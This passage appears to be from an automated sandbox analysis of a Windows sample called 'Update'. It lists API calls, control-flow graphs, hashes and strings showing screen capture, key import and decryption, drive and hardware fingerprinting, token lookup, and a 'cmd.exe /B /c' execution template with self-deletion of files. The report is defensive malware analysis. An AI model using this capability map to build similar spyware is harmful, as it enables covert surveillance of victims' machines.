                                              • SelectObject.GDI32(?,00000000), ref: 0432BDB4
                                              • SetStretchBltMode.GDI32(?,00000003), ref: 0432BDC0
                                              • GetSystemMetrics.USER32(0000004F), ref: 0432BDCD
                                              • GetSystemMetrics.USER32(0000004E), ref: 0432BDE0
                                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0432BE07
                                              • _memset.LIBCMT ref: 0432BE7A
                                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0432BE97
                                              • _memset.LIBCMT ref: 0432BEAF
                                                • Part of subcall function 0432F707: _malloc.LIBCMT ref: 0432F721
                                              • DeleteObject.GDI32(?), ref: 0432BF23
                                              • DeleteObject.GDI32(?), ref: 0432BF2D
                                              • ReleaseDC.USER32(00000000,?), ref: 0432BF39
                                              • DeleteObject.GDI32(?), ref: 0432BFDF
                                              • DeleteObject.GDI32(?), ref: 0432BFE9
                                              • ReleaseDC.USER32(00000000,?), ref: 0432BFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                              • String ID: ($6$gfff$gfff
                                              • API String ID: 3293817703-713438465
                                              • Opcode ID: 1e0c050462f9fe3476cfcedf07693701c3071e1a7295dcc7886d2334a5a09b7a
                                              • Instruction ID: f81da8a269ff7de3ec9965dccacf5404c66da8b5fb95ad9c04f36626f08a2cb0
                                              • Opcode Fuzzy Hash: 1e0c050462f9fe3476cfcedf07693701c3071e1a7295dcc7886d2334a5a09b7a
                                              • Instruction Fuzzy Hash: 90D16BB1E01318AFDB14DFE9E985AAEBBB9FF88300F145529F505AB240D774B901CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2462 6c1b56fa-6c1b5701 2463 6c1b5703-6c1b570d 2462->2463 2464 6c1b5735-6c1b5736 2462->2464 2465 6c1b570f-6c1b571a 2463->2465 2466 6c1b5721-6c1b5732 call 6c1c960c 2463->2466 2467 6c1b571c-6c1b571f 2465->2467 2468 6c1b5737-6c1b57a1 call 6c31ae8c CryptAcquireContextW 2465->2468 2466->2464 2467->2466 2473 6c1b5d4a-6c1b5d90 call 6c30bcce call 6c30b6f1 2468->2473 2474 6c1b57a7-6c1b57d4 2468->2474 2491 6c1b5d93-6c1b5dae call 6c1b56fa * 2 2473->2491 2475 6c1b57d6-6c1b57eb 2474->2475 2477 6c1b57f1-6c1b5805 CryptCreateHash 2475->2477 2478 6c1b5a30-6c1b5a66 CryptReleaseContext call 6c1b6a66 * 2 2475->2478 2482 6c1b580b-6c1b5810 2477->2482 2483 6c1b5c82-6c1b5cd9 CryptReleaseContext call 6c30bcce call 6c30b6f1 2477->2483 2502 6c1b5a68-6c1b5a72 2478->2502 2503 6c1b5aa6-6c1b5aab 2478->2503 2487 6c1b5812-6c1b582f CryptHashData 2482->2487 2488 6c1b5835-6c1b583b 2482->2488 2483->2491 2487->2488 2494 6c1b5cde-6c1b5d3e CryptDestroyHash CryptReleaseContext call 6c30bcce call 6c30b6f1 2487->2494 2492 6c1b583d-6c1b5840 2488->2492 2493 6c1b5847-6c1b584d 2488->2493 2492->2493 2499 6c1b584f 2493->2499 2500 6c1b5851-6c1b5870 call 6c1b64f8 2493->2500 2494->2491 2499->2500 2521 6c1b5872-6c1b587c call 6c1b66d0 2500->2521 2522 6c1b5881-6c1b5898 CryptHashData 2500->2522 2507 6c1b5a9c-6c1b5aa3 call 6c1c960c 2502->2507 2508 6c1b5a74-6c1b5a8a 2502->2508 2511 6c1b5aeb-6c1b5af0 2503->2511 2512 6c1b5aad-6c1b5ac2 2503->2512 2507->2503 2516 6c1b5a90-6c1b5a9a 2508->2516 2517 6c1b5d45 call 6c31ae8c 2508->2517 2514 6c1b5af2-6c1b5afc 2511->2514 2515 6c1b5b26-6c1b5b2b 2511->2515 2523 6c1b5ae1-6c1b5ae8 call 6c1c960c 2512->2523 2524 6c1b5ac4-6c1b5ad6 2512->2524 2525 6c1b5afe-6c1b5b09 2514->2525 2526 6c1b5b1c-6c1b5b23 call 6c1c960c 2514->2526 2527 6c1b5b2d-6c1b5b37 2515->2527 2528 6c1b5b60-6c1b5b73 2515->2528 2516->2507 2517->2473 2521->2522 2534 6c1b589e-6c1b58c6 CryptGetHashParam 2522->2534 2535 6c1b5bc6-6c1b5c1f CryptDestroyHash CryptReleaseContext call 6c30bcce call 6c30b6f1 2522->2535 2523->2511 2524->2517 2530 6c1b5adc-6c1b5adf 2524->2530 2525->2517 2537 6c1b5b0f-6c1b5b1a 2525->2537 2526->2515 2540 6c1b5b39-6c1b5b4b 2527->2540 2541 6c1b5b56-6c1b5b5d call 6c1c960c 2527->2541 2530->2523 2542 6c1b58cc-6c1b58d7 2534->2542 2543 6c1b5c24-6c1b5c7d CryptDestroyHash CryptReleaseContext call 6c30bcce call 6c30b6f1 2534->2543 2535->2491 2537->2526 2540->2517 2548 6c1b5b51-6c1b5b54 2540->2548 2541->2528 2544 6c1b58d9-6c1b58db 2542->2544 2545 6c1b58e5 2542->2545 2543->2491 2551 6c1b58de-6c1b58e0 2544->2551 2552 6c1b58eb-6c1b58f2 2545->2552 2553 6c1b59e1-6c1b5a00 CryptGetHashParam CryptDestroyHash 2545->2553 2548->2541 2551->2553 2557 6c1b5934-6c1b5955 call 6c30d9f0 2552->2557 2558 6c1b58f4-6c1b58fc 2552->2558 2561 6c1b5a06-6c1b5a2b call 6c1b68a0 2553->2561 2562 6c1b5b74-6c1b5bc1 CryptReleaseContext call 6c30bcce call 6c30b6f1 2553->2562 2557->2551 2564 6c1b5902-6c1b5927 2558->2564 2565 6c1b5d40 call 6c1b64ee 2558->2565 2561->2475 2562->2491 2570 6c1b5929-6c1b5932 call 6c1b1ba0 2564->2570 2571 6c1b5957-6c1b595d call 6c1c95d7 2564->2571 2565->2517 2581 6c1b5960-6c1b599b call 6c30d9f0 call 6c30d470 2570->2581 2571->2581 2586 6c1b599d-6c1b59a7 2581->2586 2587 6c1b59d1-6c1b59de 2581->2587 2588 6c1b59a9-6c1b59b4 2586->2588 2589 6c1b59c7-6c1b59ce call 6c1c960c 2586->2589 2587->2553 2588->2517 2590 6c1b59ba-6c1b59c5 2588->2590 2589->2587 2590->2589
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32 ref: 6C1B5799
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6C1B57FD
                                              • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6C1B5827
                                              • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?), ref: 6C1B5890
                                              • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 6C1B58B8
                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 6C1B59ED
                                              • CryptDestroyHash.ADVAPI32(?), ref: 6C1B59F8
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C1B5A33
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C1B5B7A
                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6C1B5B9E
                                                • Part of subcall function 6C30B6F1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C1B22CA,?,?,?,6C1E5BF2,6C1B22CA,6C38B17C,?,6C1B22CA,string too long,6C1C6933), ref: 6C30B752
                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6C1B5D6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Crypt$Hash$Context$DataParamRelease___std_exception_copy$AcquireCreateDestroyExceptionRaise
                                              • String ID: X;4l
                                              • API String ID: 1086747659-4176293028
                                              • Opcode ID: 61d878936093d1d3f0c1af5a015113e17d8a1f736e4361c6e070f0ac3a1a0bc0
                                              • Instruction ID: 6a9aae842f46c5f2ce1d119b6ab21a73b2a5fcee5d0b0df57bc8951686ec201f
                                              • Opcode Fuzzy Hash: 61d878936093d1d3f0c1af5a015113e17d8a1f736e4361c6e070f0ac3a1a0bc0
                                              • Instruction Fuzzy Hash: 89229CB2E112189FDB14CFA4CD89AAEBBB9EF49704F148229E805FB750D7749944CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2593 6c1b5dcb-6c1b5e20 call 6c1b556c 2596 6c1b5e69-6c1b5ec2 call 6c1b573c CryptAcquireContextW 2593->2596 2597 6c1b5e22-6c1b5e33 2593->2597 2602 6c1b5ec8-6c1b5f06 CryptImportKey 2596->2602 2603 6c1b62dd-6c1b6326 call 6c30bcce call 6c30b6f1 2596->2603 2597->2596 2598 6c1b5e35-6c1b5e67 call 6c1b68a0 call 6c30d470 2597->2598 2598->2596 2605 6c1b632b-6c1b6379 CryptReleaseContext call 6c30bcce call 6c30b6f1 2602->2605 2606 6c1b5f0c-6c1b5f1e CryptSetKeyParam 2602->2606 2630 6c1b6484-6c1b648b call 6c1b22c0 2603->2630 2605->2630 2609 6c1b637e-6c1b63d7 CryptDestroyKey CryptReleaseContext call 6c30bcce call 6c30b6f1 2606->2609 2610 6c1b5f24-6c1b5f3d CryptSetKeyParam 2606->2610 2609->2630 2614 6c1b63dc-6c1b6435 CryptDestroyKey CryptReleaseContext call 6c30bcce call 6c30b6f1 2610->2614 2615 6c1b5f43-6c1b5f61 2610->2615 2614->2630 2620 6c1b5f63 2615->2620 2621 6c1b5fb0-6c1b5fde CryptDecrypt CryptDestroyKey CryptReleaseContext 2615->2621 2628 6c1b5f69-6c1b5f72 2620->2628 2629 6c1b6490 call 6c1b64ee 2620->2629 2626 6c1b6437-6c1b6481 call 6c30bcce call 6c30b6f1 2621->2626 2627 6c1b5fe4-6c1b5ff2 2621->2627 2626->2630 2633 6c1b6000 2627->2633 2634 6c1b5ff4-6c1b5ffb 2627->2634 2637 6c1b5f7f-6c1b5f85 call 6c1c95d7 2628->2637 2638 6c1b5f74-6c1b5f7d call 6c1b1ba0 2628->2638 2648 6c1b6495-6c1b64b4 call 6c1b64ee call 6c1b56fa 2629->2648 2630->2629 2642 6c1b60f0-6c1b6103 2633->2642 2643 6c1b6006-6c1b600d 2633->2643 2634->2642 2657 6c1b5f88-6c1b5fad call 6c30d470 2637->2657 2638->2657 2642->2630 2654 6c1b6109-6c1b610c 2642->2654 2649 6c1b6059-6c1b606f call 6c30d9f0 2643->2649 2650 6c1b600f-6c1b6011 2643->2650 2649->2642 2650->2648 2656 6c1b6017-6c1b6045 2650->2656 2660 6c1b610e-6c1b6125 call 6c30d470 2654->2660 2661 6c1b6127-6c1b6158 2654->2661 2666 6c1b6071-6c1b607e call 6c1c95d7 2656->2666 2667 6c1b6047-6c1b6057 call 6c1b1ba0 2656->2667 2657->2621 2678 6c1b6196-6c1b619e 2660->2678 2663 6c1b616a-6c1b6175 call 6c1c95d7 2661->2663 2664 6c1b615a-6c1b6168 call 6c1b1ba0 2661->2664 2683 6c1b6178-6c1b6194 call 6c30d470 2663->2683 2664->2683 2684 6c1b6081-6c1b60af call 6c30d9f0 call 6c30d470 2666->2684 2667->2684 2685 6c1b61cc-6c1b61d1 2678->2685 2686 6c1b61a0-6c1b61aa 2678->2686 2683->2678 2721 6c1b60dd-6c1b60ed 2684->2721 2722 6c1b60b1-6c1b60bb 2684->2722 2688 6c1b61d3-6c1b61dd 2685->2688 2689 6c1b6206-6c1b620b 2685->2689 2691 6c1b61ac-6c1b61b7 2686->2691 2692 6c1b61c2-6c1b61c9 call 6c1c960c 2686->2692 2694 6c1b61df-6c1b61ea 2688->2694 2695 6c1b61f5-6c1b61ff call 6c1c960c 2688->2695 2696 6c1b620d-6c1b6222 2689->2696 2697 6c1b6252-6c1b6257 2689->2697 2699 6c1b62d8 call 6c31ae8c 2691->2699 2700 6c1b61bd-6c1b61c0 2691->2700 2692->2685 2694->2699 2706 6c1b61f0-6c1b61f3 2694->2706 2695->2689 2708 6c1b6241-6c1b624b call 6c1c960c 2696->2708 2709 6c1b6224-6c1b6236 2696->2709 2702 6c1b6259-6c1b6263 2697->2702 2703 6c1b6288-6c1b628d 2697->2703 2699->2603 2700->2692 2711 6c1b6277-6c1b6281 call 6c1c960c 2702->2711 2712 6c1b6265-6c1b6270 2702->2712 2714 6c1b628f-6c1b6299 2703->2714 2715 6c1b62c2-6c1b62d7 2703->2715 2706->2695 2708->2697 2709->2699 2717 6c1b623c-6c1b623f 2709->2717 2711->2703 2712->2699 2719 6c1b6272-6c1b6275 2712->2719 2723 6c1b629b-6c1b62b1 2714->2723 2724 6c1b62b8-6c1b62bf call 6c1c960c 2714->2724 2717->2708 2719->2711 2721->2642 2727 6c1b60bd-6c1b60c8 2722->2727 2728 6c1b60d3-6c1b60da call 6c1c960c 2722->2728 2723->2699 2729 6c1b62b3-6c1b62b6 2723->2729 2724->2715 2727->2699 2731 6c1b60ce-6c1b60d1 2727->2731 2728->2721 2729->2724 2731->2728
                                              APIs
                                                • Part of subcall function 6C1B556C: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C1B55B5
                                                • Part of subcall function 6C1B556C: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C1B562D
                                              • CryptAcquireContextW.ADVAPI32 ref: 6C1B5EBA
                                              • CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?), ref: 6C1B5EFE
                                              • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 6C1B5F16
                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 6C1B5F35
                                              • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 6C1B5FC1
                                              • CryptDestroyKey.ADVAPI32(?,?,?), ref: 6C1B5FCC
                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?), ref: 6C1B5FD6
                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6C1B6303
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C1B632F
                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6C1B6356
                                              • CryptDestroyKey.ADVAPI32(?), ref: 6C1B6381
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C1B638D
                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6C1B63B4
                                                • Part of subcall function 6C30B6F1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C1B22CA,?,?,?,6C1E5BF2,6C1B22CA,6C38B17C,?,6C1B22CA,string too long,6C1C6933), ref: 6C30B752
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$Release___std_exception_copy$BinaryDestroyParamString$AcquireDecryptExceptionImportRaise
                                              • String ID: Salt$X;4l$ed__
                                              • API String ID: 2404961614-4278597082
                                              • Opcode ID: 93935b5a5b37c18af8d99cdbfcf65de726862f8a77bbae1c94276934536bb6b4
                                              • Instruction ID: a68ffc219752b1832c3b7e24011fc45996a60c7c3b8575b21ddacedcf699ace4
                                              • Opcode Fuzzy Hash: 93935b5a5b37c18af8d99cdbfcf65de726862f8a77bbae1c94276934536bb6b4
                                              • Instruction Fuzzy Hash: F0229EB2E012189FEB18CF68CC55BAEBBB9EF55308F148269E805F7740E73599448F91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen$CopyFile
                                              • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$itor$tor.
                                              • API String ID: 2689559967-3443813646
                                              • Opcode ID: 0e4c008c9ca34d06b402bb0c26a320e789fd2a6f87b8197fe9bbde302edadf6e
                                              • Instruction ID: 1ef5c488d9a57b220ccc6603493b6c1aa13b4be4b4b7be33dac86293880c98be
                                              • Opcode Fuzzy Hash: 0e4c008c9ca34d06b402bb0c26a320e789fd2a6f87b8197fe9bbde302edadf6e
                                              • Instruction Fuzzy Hash: F752AEB1900B018BE325CF38C890796B7E5BF89318F144A2ED59A97B91EB34F585CF91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$tor.
                                              • API String ID: 4218353326-3685226845
                                              • Opcode ID: 5b3818781bf766f8bbf44993bdba6f4c0506c38b3f3e9cf54d5b8d8c0c6901cb
                                              • Instruction ID: b3e4059851dc31664f5813e3b134e9a1a44b170e4a872b3470e4a9b4d7482fb5
                                              • Opcode Fuzzy Hash: 5b3818781bf766f8bbf44993bdba6f4c0506c38b3f3e9cf54d5b8d8c0c6901cb
                                              • Instruction Fuzzy Hash: FD629DB1900B018BE725CF38C8907A6B7E5BF89314F144A2ED5AA97B81EB34F545CF91
                                              APIs
                                              • WinExec.KERNEL32(?,00000000), ref: 6C1C1A1B
                                              • _strlen.LIBCMT ref: 6C1C1CD9
                                              • WinExec.KERNEL32(?,00000000), ref: 6C1C1F8C
                                              • Sleep.KERNEL32(00007530), ref: 6C1C1F97
                                              • _strlen.LIBCMT ref: 6C1C1FC2
                                              • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 6C1C2073
                                              • _strlen.LIBCMT ref: 6C1C20D8
                                              • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 6C1C2188
                                              • DeleteFileA.KERNEL32(?), ref: 6C1C21E4
                                              • DeleteFileA.KERNEL32(?), ref: 6C1C21FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: File$_strlen$AttributesDeleteExec$Sleep
                                              • String ID: %$&
                                              • API String ID: 4120753353-3793893698
                                              • Opcode ID: 47d3ed332570fb736e345975b37d9a73acf477e486e007fd8c93ccf0cb8b498e
                                              • Instruction ID: 04057ff9abb62e0ad4c228942364a70501577e7283bf68498d0dc64c70d29b78
                                              • Opcode Fuzzy Hash: 47d3ed332570fb736e345975b37d9a73acf477e486e007fd8c93ccf0cb8b498e
                                              • Instruction Fuzzy Hash: 9F82F7B2E001248FDB28CF64CC987DDB7B2AF55318F154268E519B7780DB789E858F92
                                              APIs
                                              • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04328132
                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 04328166
                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 04328176
                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 043281A6
                                              • lstrlenW.KERNEL32(?), ref: 043281B7
                                              • __wcsnicmp.LIBCMT ref: 043281CE
                                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 04328204
                                              • lstrcpyW.KERNEL32(?,?), ref: 04328228
                                              • lstrcatW.KERNEL32(?,00000000), ref: 04328233
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                              • String ID: A:\$B:\
                                              • API String ID: 950920757-1009255891
                                              • Opcode ID: 4a964ae0f662ac3420bccbbcd7d019405f68c6479852ec62c763073b9e347877
                                              • Instruction ID: 4b922c674e654720d7c2f26c52f3941eddb7365bfa3bff944f4be44c4cfd0ffc
                                              • Opcode Fuzzy Hash: 4a964ae0f662ac3420bccbbcd7d019405f68c6479852ec62c763073b9e347877
                                              • Instruction Fuzzy Hash: 72414375A012289BDB14DFA4DD44AEEB3BCEF88714F005199EA19A3140EB74BA05CB94
                                              APIs
                                                • Part of subcall function 04325320: InterlockedDecrement.KERNEL32(00000008), ref: 0432536F
                                                • Part of subcall function 04325320: SysFreeString.OLEAUT32(00000000), ref: 04325384
                                                • Part of subcall function 04325320: SysAllocString.OLEAUT32(04345148), ref: 043253D5
                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,04345148,043269A4,04345148,00000000,75BF73E0), ref: 043267F4
                                              • GetLastError.KERNEL32 ref: 043267FE
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04326816
                                              • HeapAlloc.KERNEL32(00000000), ref: 0432681D
                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0432683F
                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04326871
                                              • GetLastError.KERNEL32 ref: 0432687B
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 043268E6
                                              • HeapFree.KERNEL32(00000000), ref: 043268ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                              • String ID: NONE_MAPPED
                                              • API String ID: 1317816589-2950899194
                                              • Opcode ID: f5f2f02ea41c55fcd70c9cf8a468a0c7f5f961e65c99016b5ed90ad826d94cde
                                              • Instruction ID: 9c1fd350acaa9fcb4e13560661514ee8cd8a7ae5f7f6327cfeebb4567c066da0
                                              • Opcode Fuzzy Hash: f5f2f02ea41c55fcd70c9cf8a468a0c7f5f961e65c99016b5ed90ad826d94cde
                                              • Instruction Fuzzy Hash: EF4161B5A00228ABDB209B64DD45FFF77BCEFC8704F406499F709A6140DA74AE858F60
                                              APIs
                                              • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 04326C8B
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 04326CAA
                                              • _memset.LIBCMT ref: 04326CE1
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 04326CF4
                                              • swprintf.LIBCMT ref: 04326D39
                                              • swprintf.LIBCMT ref: 04326D4C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                              • String ID: %sFree%d Gb $:$@$HDD:%d
                                              • API String ID: 3202570353-3501811827
                                              • Opcode ID: 49cd42903147316b884846089d1bf03121b3c833cfb09c74077302ea1fe3ddae
                                              • Instruction ID: acb3d960cb3636ef8798340c90871042c469e31c2a88124016ed247720069fc1
                                              • Opcode Fuzzy Hash: 49cd42903147316b884846089d1bf03121b3c833cfb09c74077302ea1fe3ddae
                                              • Instruction Fuzzy Hash: 58313EB6E0021CABDB14CFE5CC45BEEB7B9FF88700F50521DE91AA7241DA746905CB50
                                              APIs
                                              • CreateDXGIFactory.DXGI(0434579C,?,45F3111E,74DEDF80,00000000,75BF73E0), ref: 04326F4A
                                              • swprintf.LIBCMT ref: 0432711E
                                              • std::_Xinvalid_argument.LIBCPMT ref: 043271C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                              • API String ID: 3803070356-257307503
                                              • Opcode ID: 6a20af08e643b24c3e5c3c4f0cca899dd9c4b047244e3f7bb1987883150e3d07
